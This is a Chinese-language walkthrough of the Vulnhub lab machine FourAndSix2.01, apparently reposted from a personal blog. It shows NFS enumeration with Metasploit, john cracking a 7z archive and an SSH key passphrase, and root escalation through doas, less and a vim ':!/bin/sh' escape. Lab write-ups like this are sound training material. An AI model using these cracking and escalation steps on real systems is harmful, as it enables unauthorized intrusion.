2026-03-29 23:55:15 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文记录了Vulnhub靶机FourAndSix2.01的完整渗透过程，通过NFS挂载发现加密备份文件，使用john工具爆破7z密码和SSH私钥密码，成功获取用户权限后利用doas配置中的less命令配合vim进行提权，最终获得root权限，展示了从信息搜集到权限提升的完整攻击链。 综合评分： 75 文章分类： 渗透测试,红队,实战经验,内网渗透,安全工具

cover_image

跟着红队笔记打靶：FourAndSix2.01

原创

网安热爱者week 网安热爱者week

week的杂货铺

2026年3月26日 20:09 江苏

靶场地址：

https://www.vulnhub.com/entry/fourandsix-201,266/

大佬的视频：

【「红队笔记」靶机精讲：FourandSix2.01 – 小巧精悍，干净利落的靶机，暴力破解x2，更有less+vi提权。】https://www.bilibili.com/video/BV1Kv4y187Ch?vd_source=3caf2dac9c9273de4d9b0fead4712250

1. 信息搜集：

1.1. 主机发现：

139是靶机

1.2. 端口扫描：

TCP:

有一个nfs挂载甚至是默认端口2049

UDP:

1.3. 详细扫描：

nmap自带脚本扫描：

没啥结果。。。。

有nsf挂载的话

看一下挂载:

挂载到本地：

这里也可以使用msf进行挂载：

msf > use &nbsp;auxiliary/scanner/nfs/nfsmountmsf auxiliary(scanner/nfs/nfsmount) > show options
Module options (auxiliary/scanner/nfs/nfsmount):
&nbsp; &nbsp;NameCurrent Setting &nbsp;Required &nbsp;Description&nbsp; &nbsp;------------------- &nbsp;-------- &nbsp;-----------&nbsp; &nbsp;PROTOCOLudp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;yes&nbsp; &nbsp; &nbsp; &nbsp;The protocol to use (Accepted: udp, tcp)&nbsp; &nbsp;RHOSTS &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;yes&nbsp; &nbsp; &nbsp; &nbsp;The target address range or CIDR identifier&nbsp; &nbsp;RPORT111 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;yes&nbsp; &nbsp; &nbsp; &nbsp;The target port (TCP)&nbsp; &nbsp;THREADS1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;yes&nbsp; &nbsp; &nbsp; &nbsp;The number of concurrent threads
msf auxiliary(scanner/nfs/nfsmount) >&nbsp;set&nbsp;rhosts 192.168.137.139rhosts => 192.168.137.139msf auxiliary(scanner/nfs/nfsmount) > run
[+] 192.168.137.139:111 &nbsp; &nbsp; &nbsp; - 192.168.137.139 NFS Export: /home/user/storage [][*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed

cd进去里面有一个7z文件拷贝到本地

没啥特别的东西但是需要密码。。。

利用hash进行密码爆破：

7z2john&nbsp;backup.7z > backup7z_hashjohn&nbsp;--format=7z --wordlist=/usr/share/wordlists/rockyou.txt backup7z_hash

结果是chocolate

解开之后是这几个文件：

图片没啥信息。。。

但是两个rsa是ssh的密钥一个公钥一个私钥

这里已经可以明确是使用这个进行ssh登陆了

尝试一下：

这个报错是说之前有过这个ip的ssh记录了需要删除一下：

sudo&nbsp;ssh-keygen -f&nbsp;'/root/.ssh/known_hosts'&nbsp;-R&nbsp;'192.168.137.139'

再访问发现还需要一个密码：

依旧是请john解密：

最后是12345678

成功进入：

ksh是个啥玩意。。。

sudo不能用

/etc/crontab没有

/etc/passwd:

看一下自己可用的文件：

看一下以最高权限运行的文件：

用doas吧

doas的默认config路径： /etc/doas.conf

可以以root权限运行less查看authlog

那这里就是less提权了

这里查了半天doas咋用…

运行这个就可以了：

doas&nbsp;/usr/bin/less /var/log/authlog

doas会自己使用root权限去使用less查看authlog

less提权就比较正常了

但是这里不允许直接!/bin/sh

换一个方式的话按v调用vim

然后在vim里面提权输入：

:!/bin/sh

成功返回root:

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：week的杂货铺网安热爱者week 网安热爱者week《跟着红队笔记打靶：FourAndSix2.01》